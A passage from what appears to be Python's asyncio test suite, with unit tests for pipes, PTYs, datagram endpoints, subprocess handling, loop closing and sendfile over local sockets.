isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
@unittest.skipIf(sys.platform == 'darwin', 'test hangs on MacOS')
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2, loop=loop)
await asyncio.sleep(1e-4, loop=loop)
await asyncio.sleep(1e-6, loop=loop)
await asyncio.sleep(1e-8, loop=loop)
await asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
class SendfileBase:
DATA = b"12345abcde" * 160 * 1024 # 160 KiB
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
class SockSendfileMixin(SendfileBase):
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def prepare_socksendfile(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, ('127.0.0.1', port)))
def cleanup():
if proto.transport is not None:
# can be None if the task was cancelled before
# connection_made callback
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_success(self):
sock, proto = self.prepare_socksendfile()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sock_sendfile_with_offset_and_count(self):
sock, proto = self.prepare_socksendfile()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(proto.data, self.DATA[1000:3000])
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(ret, 2000)
def test_sock_sendfile_zero_size(self):
sock, proto = self.prepare_socksendfile()
with tempfile.TemporaryFile() as f:
ret = self.run_loop(self.loop.sock_sendfile(sock, f,
0, None))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 0)
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_mix_with_regular_send(self):
buf = b'1234567890' * 1024 * 1024 # 10 MB
sock, proto = self.prepare_socksendfile()
self.run_loop(self.loop.sock_sendall(sock, buf))
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
self.run_loop(self.loop.sock_sendall(sock, buf))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
expected = buf + self.DATA + buf
self.assertEqual(proto.data, expected)
self.assertEqual(self.file.tell(), len(self.DATA))
class SendfileMixin(SendfileBase):
class MySendfileProto(MyBaseProto):
def __init__(self, loop=None, close_after=0):
super().__init__(loop)
self.data = bytearray()
self.close_after = close_after
def data_received(self, data):
self.data.extend(data)
super().data_received(data)
if self.close_after and self.nbytes >= self.close_after:
self.transport.close()
# Note: sendfile via SSL transport is equal to sendfile fallback
def prepare_sendfile(self, *, is_ssl=False, close_after=0):
port = support.find_unused_port()
srv_proto = self.MySendfileProto(loop=self.loop,
close_after=close_after)
if is_ssl:
if not ssl:
self.skipTest("No ssl module")
srv_ctx = test_utils.simple_server_sslcontext()
cli_ctx = test_utils.simple_client_sslcontext()
else:
srv_ctx = None
cli_ctx = None
srv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# reduce recv socket buffer size to test on relative small data sets
srv_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: srv_proto, sock=srv_sock, ssl=srv_ctx))
if is_ssl:
server_hostname = support.HOST
else:
server_hostname = None
cli_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# reduce send socket buffer size to test on relative small data sets
cli_sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
cli_sock.connect((support.HOST, port))
cli_proto = self.MySendfileProto(loop=self.loop)
tr, pr = self.run_loop(self.loop.create_connection(
lambda: cli_proto, sock=cli_sock,
ssl=cli_ctx, server_hostname=server_hostname))
def cleanup():
srv_proto.transport.close()
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.run_loop(cli_proto.done)
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return srv_proto, cli_proto
@unittest.skipIf(sys.platform == 'win32', "UDP sockets are not supported")
def test_sendfile_not_supported(self):
tr, pr = self.run_loop(
self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
family=socket.AF_INET))
try:
with self.assertRaisesRegex(RuntimeError, "not supported"):
self.run_loop(
self.loop.sendfile(tr, self.file))
self.assertEqual(0, self.file.tell())
finally:
# don't use self.addCleanup because it produces resource warning
tr.close()
def test_sendfile(self):
srv_proto, cli_proto = self.prepare_sendfile()
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_force_fallback(self):
srv_proto, cli_proto = self.prepare_sendfile()
def sendfile_native(transp, file, offset, count):
# to raise SendfileNotAvailableError
return base_events.BaseEventLoop._sendfile_native(
self.loop, transp, file, offset, count)
self.loop._sendfile_native = sendfile_native
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_force_unsupported_native(self):
if sys.platform == 'win32':
if isinstance(self.loop, asyncio.ProactorEventLoop):
self.skipTest("Fails on proactor event loop")
srv_proto, cli_proto = self.prepare_sendfile()
def sendfile_native(transp, file, offset, count):
# to raise SendfileNotAvailableError
return base_events.BaseEventLoop._sendfile_native(
self.loop, transp, file, offset, count)
self.loop._sendfile_native = sendfile_native
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not supported"):
self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file,
fallback=False))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(srv_proto.nbytes, 0)
self.assertEqual(self.file.tell(), 0)
def test_sendfile_ssl(self):
srv_proto, cli_proto = self.prepare_sendfile(is_ssl=True)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_for_closing_transp(self):
srv_proto, cli_proto = self.prepare_sendfile()
cli_proto.transport.close()
with self.assertRaisesRegex(RuntimeError, "is closing"):
self.run_loop(self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertEqual(srv_proto.nbytes, 0)
self.assertEqual(self.file.tell(), 0)
def test_sendfile_pre_and_post_data(self):
srv_proto, cli_proto = self.prepare_sendfile()
PREFIX = b'zxcvbnm' * 1024
SUFFIX = b'0987654321' * 1024
cli_proto.transport.write(PREFIX)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.write(SUFFIX)
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.data, PREFIX + self.DATA + SUFFIX)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_ssl_pre_and_post_data(self):
srv_proto, cli_proto = self.prepare_sendfile(is_ssl=True)
PREFIX = b'zxcvbnm' * 1024
SUFFIX = b'0987654321' * 1024
cli_proto.transport.write(PREFIX)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.write(SUFFIX)
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.data, PREFIX + self.DATA + SUFFIX)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_partial(self):
srv_proto, cli_proto = self.prepare_sendfile()
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file, 1000, 100))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, 100)
